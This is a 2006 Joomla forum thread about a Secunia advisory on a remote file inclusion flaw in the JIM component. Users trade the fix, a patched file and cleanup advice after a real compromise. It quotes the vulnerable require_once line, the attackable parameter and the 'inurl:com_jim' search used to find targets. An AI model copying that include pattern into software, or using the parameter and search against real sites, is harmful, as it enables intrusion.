Joomla JIM Component File Inclusion Vulnerability
Moderator: General Support Moderators
Forum rules
- smart
- Joomla! Enthusiast
- Posts: 109
- Joined: Thu Aug 18, 2005 1:33 pm
- Location: Sebastopol
- Contact:
Joomla JIM Component File Inclusion Vulnerability
Secunia Advisory: SA21545 Print Advisory
Release Date: 2006-08-18
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: JIM 1.x (component for Joomla)
Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.
Description:
XORON has discovered a vulnerability in the JIM component for Joomla, which can be exploited by malicious people to compromise a vulnerable system.
Input passed to the "mosConfig_absolute_path" parameter in components/com_jim/install.jim.php is not properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
Successful exploitation requires that "register_globals" is enabled.
The vulnerability has been confirmed in version 1.0.1. Other versions may also be affected.
Solution:
Edit the source code to ensure that the input is properly verified.
Set "register_globals" to "Off".
Read more: http://secunia.com/advisories/21545/
Release Date: 2006-08-18
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: JIM 1.x (component for Joomla)
Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.
Description:
XORON has discovered a vulnerability in the JIM component for Joomla, which can be exploited by malicious people to compromise a vulnerable system.
Input passed to the "mosConfig_absolute_path" parameter in components/com_jim/install.jim.php is not properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
Successful exploitation requires that "register_globals" is enabled.
The vulnerability has been confirmed in version 1.0.1. Other versions may also be affected.
Solution:
Edit the source code to ensure that the input is properly verified.
Set "register_globals" to "Off".
Read more: http://secunia.com/advisories/21545/
Joomlaportal.ru News, articles and tutorials
Joomlaforum.ru Russian Joomla Support Forum
Member of the Russian Joomla Translation Team
Joomlaforum.ru Russian Joomla Support Forum
Member of the Russian Joomla Translation Team
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
URGENT You can make JIM secured (for this point) by removing line 16 in install.jim.php:
Any user who is victim of an attack using JIM will get free support on :
http://www.joomlation.eu (intl)
or
http://www.joomlation.org (fr)
Code: Select all
require_once($mosConfig_absolute_path."/components/com_jim/readme.txt");
http://www.joomlation.eu (intl)
or
http://www.joomlation.org (fr)
Last edited by globule on Fri Aug 18, 2006 1:33 pm, edited 1 time in total.
- Tonie
- Joomla! Master
- Posts: 16553
- Joined: Thu Aug 18, 2005 7:13 am
Re: Joomla JIM Component File Inclusion Vulnerability
@globule. That was fast, good to read. Just sent you an email five minutes ago.
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
I subscribed to Secunia a few days ago! :P
I was cooking for my children when I've been informed
Thanks for the information anyway!
All "Come on... Joomla!" members informed using the newsletter. As this site will soon close, my efforts (Jim included) goes to Joomlation.
Here is the patched file for users. Use FTP to update /administrator/components/com_jim/install.jim.php
You don't need to remove JIM. If you do so, you will loose ALL messages(This is already corrected for next version)
The patch is also available on Joomlation.eu
I was cooking for my children when I've been informed
Thanks for the information anyway!
All "Come on... Joomla!" members informed using the newsletter. As this site will soon close, my efforts (Jim included) goes to Joomlation.
Here is the patched file for users. Use FTP to update /administrator/components/com_jim/install.jim.php
You don't need to remove JIM. If you do so, you will loose ALL messages(This is already corrected for next version)
The patch is also available on Joomlation.eu
You do not have the required permissions to view the files attached to this post.
Last edited by globule on Fri Aug 18, 2006 1:52 pm, edited 1 time in total.
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
http://www.joomlation.eu/
Forbidden
You don't have permission to access / on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
Forbidden
You don't have permission to access / on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
joomla 1.6 Türk destek sitesi http://www.joomlaturk.net/
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
It works for me!
Where are you from?
Where are you from?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Well, I had people from 14 different countries do a google search on inurl:com_jim and they tagged me good. My site is completely down for now.
Luckily for me I was at the top of the google search (mixed blessing).
Scott
http://www.shutchi2.com
Luckily for me I was at the top of the google search (mixed blessing).
Scott
http://www.shutchi2.com
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Re : Joomla JIM Component File Inclusion Vulnerability
of course it works for you !!globule wrote: It works for me!
Where are you from?
I am from İstanbul Turkey.
most likely you banned all the Turkish IPs.
I am fed up arguing about this subject.... I'd gave up !!!
you guys do whatever makes you happy... I have respect to your decision.
I can connect to http://www.joomlation.org/ but my french sucks !
EDİT
thanks for removing IP ban globule..
I'd appreciated your decision.
Last edited by Anonymous on Fri Aug 18, 2006 1:26 pm, edited 1 time in total.
joomla 1.6 Türk destek sitesi http://www.joomlaturk.net/
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
Now JIM has been attacked, the whole site can be considered has tested and safe (I hope...)
So this filter will soon be removed. I'm sorry I had to take such a decision...
So this filter will soon be removed. I'm sorry I had to take such a decision...
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Re: Joomla JIM Component File Inclusion Vulnerability
Is it down because you've been hacked?shutchi2 wrote: Well, I had people from 14 different countries do a google search on inurl:com_jim and they tagged me good. My site is completely down for now.
Luckily for me I was at the top of the google search (mixed blessing).
Scott
http://www.shutchi2.com
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
It appears that way, but I'm going through logs right now to figure out what happened. I'm on the console and the server is working but it looks like some files were modified. Keeping it offline until I figure out what got changed.
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
You can get the list of all your files sorted by last modification date on joomlation.eu : filist.php
Once you get this list, remove this script...
Once you get this list, remove this script...
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Re: Joomla JIM Component File Inclusion Vulnerability
Thanks to remind me this function!shutchi2 wrote: Well, I had people from 14 different countries do a google search on inurl:com_jim and they tagged me good.
I contacted all sites listed (2 pages) except one having no information about how to do so : http://www.infopyme.com.py
I also noticed many of the versions used on these sites are not up to date... This will be token in consideration for next version.
This forum url has been sent to Secunia as source for the patch.
Thanks a lot to joomla.org and its community to keep users informed so fast.
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Re : Joomla JIM Component File Inclusion Vulnerability
I urge every joomla user to utilize filist.php tool.globule wrote: You can get the list of all your files sorted by last modification date on joomlation.eu : filist.php
Once you get this list, remove this script...
it takes 2 seconds to find hacker scripts in your server with this method.
anybody that uploaded shell scripts will show at the top of the list.
simple just remove them ( DO NOT DOWNLOAD )
your anti virus program will give virus alert if you try to download.
joomla 1.6 Türk destek sitesi http://www.joomlaturk.net/
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Found a php.haxplore file that was recently added, looking for info on it...anyone familiar with this?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Well I'm back up and patched, my AV went nuts with the php.haxplore file so I deleted it. Thanks for your help everyone, and that filist.php script works great!
Scott
Scott
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
Don't forget to remove it!
Was Jim used to upload the file? What the logs told you?
Was Jim used to upload the file? What the logs told you?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
The logs didn't tell me what they used to upload it, just where it came from (proxy). Sometimes win32 servers leave something to be desired...
-
- Joomla! Intern
- Posts: 73
- Joined: Thu Sep 08, 2005 6:37 am
Re: Re : Joomla JIM Component File Inclusion Vulnerability
joomlaturk wrote:I urge every joomla user to utilize filist.php tool.globule wrote: You can get the list of all your files sorted by last modification date on joomlation.eu : filist.php
Once you get this list, remove this script...
it takes 2 seconds to find hacker scripts in your server with this method.
anybody that uploaded shell scripts will show at the top of the list.
simple just remove them ( DO NOT DOWNLOAD )
your anti virus program will give virus alert if you try to download.
But can you tell a novice exactly how you use the filist.php tool? Do you uploade it to your server - where???
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Sep 02, 2005 12:17 pm
Re: Joomla JIM Component File Inclusion Vulnerability
filist.php doesn't seem to be available from joomlation.eu
Any alternative tool or source?
Any alternative tool or source?
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Of course it is !trebso wrote:filist.php doesn't seem to be available from joomlation.eu
Any alternative tool or source?
http://joomlation.eu/index.php?option=c ... &Itemid=35
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Sep 02, 2005 12:17 pm
Re: Joomla JIM Component File Inclusion Vulnerability
My mistake - I searched for filist.php not filist.
Thanks
Thanks